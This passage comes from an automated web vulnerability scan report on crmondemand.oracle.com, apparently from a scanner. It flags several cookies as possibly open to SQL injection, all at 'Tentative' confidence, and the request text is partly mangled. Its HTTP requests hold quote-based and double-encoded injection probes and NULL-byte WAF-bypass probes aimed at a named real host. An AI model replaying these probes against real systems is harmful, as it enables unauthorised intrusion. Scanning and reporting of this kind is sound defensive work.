1.18. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [gpw_e24 cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/wcm/sitestudio/wcm.toggle.js
Issue detail
The gpw_e24 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gpw_e24 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..%00' ; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response 1
HTTP/1.1 404 Not Found82d5c0"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (G;max-age=60+0;age=0;ecid=50158730208872077,0:1)Error Page 404</title>...[SNIP]...
Request 2
GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..%00'' ; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response 2
HTTP/1.1 200 OKeb45c0"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=196;ecid=49718178233452330,0:1)////////////////////////////////////////////////////...[SNIP]...
1.19. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [p_cur_URL cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/wcm/sitestudio/wcm.toggle.js
Issue detail
The p_cur_URL cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the p_cur_URL cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the p_cur_URL cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233%2527 ; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response 1
HTTP/1.1 404 Not Found"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=60+0;age=27;ecid=49473983572837249,0:1)Error Page 404</title>...[SNIP]...
Request 2
GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233%2527%2527 ; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response 2
HTTP/1.1 200 OKeb45c0"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=30;ecid=49937913055249439,0:1)////////////////////////////////////////////////////...[SNIP]...
1.20. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [s_nr cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/wcm/sitestudio/wcm.toggle.js
Issue detail
The s_nr cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_nr cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_nr cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1.com/en/index.htm;q=0.3%2527 ; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response 1
HTTP/1.1 404 Not Found"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=60+0;age=24;ecid=49473687220090659,0:1)Error Page 404</title>...[SNIP]...
Request 2
GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1.com/en/index.htm;q=0.3%2527%2527 ; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response 2
HTTP/1.1 200 OKeb45c0"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=1;ecid=49402201784416147,0:1)////////////////////////////////////////////////////...[SNIP]...
1.21. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [s_sess cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/wcm/sitestudio/wcm.toggle.js
Issue detail
The s_sess cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sess cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B%00' ; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response 1
HTTP/1.1 404 Not Found82d5c0"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=60+0;age=46;ecid=50157325754549082,0:1)Error Page 404</title>...[SNIP]...
Request 2
GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B%00'' ; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response 2
HTTP/1.1 200 OKeb45c0"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=20;ecid=49403906886452225,0:1)////////////////////////////////////////////////////...[SNIP]...
1.22. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [s_wgw_lv cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://crmondemand.oracle.com
Path:
/ocom/resources/wcm/sitestudio/wcm.toggle.js
Issue detail
The s_wgw_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_wgw_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_wgw_lv cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1.com/en/index.htm;q=0.3%2527 ; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response 1
HTTP/1.1 404 Not Found"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=60+0;age=16;ecid=49473081629694616,0:1)Error Page 404</title>...[SNIP]...
Request 2
GET /ocom/resources/wcm/sitestudio/wcm.toggle.js HTTP/1.1.com/en/index.htm;q=0.3%2527%2527 ; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response 2
HTTP/1.1 200 OKeb45c0"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=294;ecid=49401626258791188,0:1)////////////////////////////////////////////////////...[SNIP]...
1.23. http://crmondemand.oracle.com/ocom/websites/crmoden/sitenavigationfunctions.js [gpw_e24 cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://crmondemand.oracle.com
Path:
/ocom/websites/crmoden/sitenavigationfunctions.js
Issue detail
The gpw_e24 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gpw_e24 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gpw_e24 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /ocom/websites/crmoden/sitenavigationfunctions.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..%2527 ; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response 1
HTTP/1.1 404 Not Found"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (G;max-age=60+0;age=0;ecid=49477385186977220,0:1)Error Page 404</title>...[SNIP]...
Request 2
GET /ocom/websites/crmoden/sitenavigationfunctions.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..%2527%2527 ; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response 2
HTTP/1.1 200 OK"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=126;ecid=49405904046270069,0:1)=SS_GET_PAGE&";////////////////////////////////////////////////////...[SNIP]...
1.24. http://crmondemand.oracle.com/ocom/websites/crmoden/sitenavigationfunctions.js [s_cc cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://crmondemand.oracle.com
Path:
/ocom/websites/crmoden/sitenavigationfunctions.js
Issue detail
The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
